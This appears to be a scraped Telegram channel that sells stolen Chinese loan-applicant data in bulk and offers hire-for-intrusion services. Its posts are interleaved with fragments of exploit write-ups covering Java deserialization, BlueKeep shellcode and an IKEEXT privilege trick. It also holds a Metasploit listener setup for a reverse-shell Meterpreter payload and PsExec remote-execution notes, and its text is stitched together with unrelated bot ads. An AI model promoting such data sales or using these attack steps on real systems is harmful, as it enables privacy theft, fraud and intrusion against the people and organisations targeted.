Overseas and domestic data cracking
5.36K subscribers
148 photos
4 links
Overseas and domestic data cracking
consult;@comeblackgirl
Download Telegram
The material for the IOU is about 80-90 yuan. The price is a bit expensive.
[New Inquiries Received]
China Merchants Bank Financial Services Inquiry Application (New)

Youqian Dan Inquiry Application (New)

Nan Yin Faba Inquiry Application

Ping An Loan Inquiry Application

Du Xiaoman Inquiry Application

360 Jiedian Inquiry Application

Output Quantity: 500

Large-scale Order Receiving with Effects Tested Multiple Times (5-12 Conversions)

Output Time: Orders can be delivered on the same day as they are reported, unless it's a very small city
Infiltration technology team, capable of infiltration, accessing the backend, modifying servers, conducting intrusions, etc.

consult;@comeblackgirl
Infiltration technology team, capable of infiltration, accessing the backend, modifying servers, conducting intrusions, etc.

consult;@comeblackgirl
When you enter, you can see that because the incoming cache is true, the mapping will associate the instance of the JdbcRowSetImpl object with the com.sun.rowset.JdbcRowSetImpl class. OK, the analysis of A ends here.
Let's use the RASTAPI module to demonstrate vulnerability exploitation. The IKEEXT service uses this module, so we can trigger event log behavior by initiating any VPN connection. The default settings of the relevant registry keys are as follows:
— 让搜索更高效 · 让信息更有价值 —

🔍帮你找到有趣的群组、频道、视频、音乐、电影、新闻
📢:
@CJYQNEWS | 🤖: @CJYQ
👇点击下方按钮,进行搜索👇
Please open Telegram to view this post
VIEW IN TELEGRAM
超索 @ChaoSuoBOT  

让你轻松找到群组、频道、视频、音乐、电影、新闻!

👇点击下方按钮开始搜索👇
🔍项目搜索 @XMSSBOT 是一个TG项目对接平台,它可以找到你感兴趣的项目,资源,人脉,信息,渠道
After the vulnerability was exposed, the proof-of-concept (POC) was not released for a long time. The versions that could be successfully exploited were updated daily. There were several keywords related to the versions, including "51", "48", and "58", but it was unclear which one was the actual version. Therefore, I decided to check the official announcements first. I found that only the announcement for version 49 mentioned "enhanced security protection". So I started searching for versions 48 and 49 to look for commit logs, but I didn't find anything at that time.
The vulnerability trigger point is in termdd.sys. When the shellcode is executed, the IRQL is DISPATCH_LEVEL, which requires special handling. BlueKeep uses the shellcode of the module to implement the logic that is basically the same as Eternal Blue. Both first hook the syscall and then use APC injection to complete the transfer of R0 to R3. There is one difference. BlueKeep uses the egg hunter method to search for and copy the user-mode payload during the execution of the shellcode (due to the limited size of the data sent in a single virtual channel), while the offset position of the user-mode payload in Eternal Blue is fixed.
consult;@comeblackgirl
If the exploitation of the vulnerability is successful, the shellcode will be executed at the address termdd!IcaChannelInputInternal+17d.

consult;@comeblackgirl
Then copy it to the XP system and note the location, such as C:\s.dll
Run msf on Kali, with the specific commands as follows

msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.232.134
LHOST => 192.168.232.134
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > exploit
consult;@comeblackgirl
Using PsExec on a Single Remote Computer
To start using PsExec, simply close the existing PowerShell console and launch a new one. If you want to use it in the command prompt, you can start the command prompt. Just make sure to start an elevated session, as PsExec requires administrator permissions to run programs on remote computers. Non-administrators can also use PsExec locally.
@comeblackgirl